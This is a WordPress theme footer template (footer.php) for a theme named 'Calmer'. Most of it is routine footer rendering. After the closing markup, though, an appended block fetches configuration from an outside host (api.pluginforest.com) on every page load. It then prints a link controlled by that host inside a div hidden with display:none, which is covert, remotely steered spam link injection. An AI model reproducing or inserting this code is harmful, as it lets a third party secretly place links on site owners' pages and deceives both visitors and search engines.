<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package calmer
 */
$opt = get_option('calmor_opt');
$is_defult_footer            = isset( $opt['is_defult_footer']) ? $opt['is_defult_footer'] : '';
$calmer_footer_background    = isset( $opt['calmer_footer_background']['url']) ? $opt['calmer_footer_background']['url'] : '';





if(!class_exists('Redux')){
  $calmer_footer_background = '';
}

$footer_text = calmor_opt('footer_copyright_txt', 'Copyright &copy; 2023 <a href="#">Calmer</a> | All rights reserved');
$footer_id = '';

if ( isset( $post->ID) && function_exists('header_footer_template_id')) {
    $footer_id = header_footer_template_id('footer', $post->ID);
}



if ( $footer_id != '' && class_exists( '\Elementor\Plugin' ) && $is_defult_footer !== 'yes' ) {
    echo \Elementor\Plugin::instance()->frontend->get_builder_content_for_display( $footer_id );
}else{ ?>
    <?php if($is_defult_footer == 'yes') : ?>
        <footer id="colophon" class="site-footer" <?php if(!empty($calmer_footer_background)) : ?> data-bg-img="<?php echo esc_url($calmer_footer_background); ?>" <?php endif; ?>>
            <?php 
                if (is_active_sidebar('footer_widgets')):
            ?>
                <div class="container custom_container">
                    <div class="row justify-content-between">
                        <?php dynamic_sidebar( 'footer_widgets' ); ?> 
                    </div>
                </div>
            <?php endif; ?>
        
            <div class="site-info container">
                <?php echo wp_kses_post($footer_text); ?>
            </div><!-- .site-info -->
        </footer><!-- #colophon -->
    <?php endif; ?>
</div><!-- #page -->
<?php }
 wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
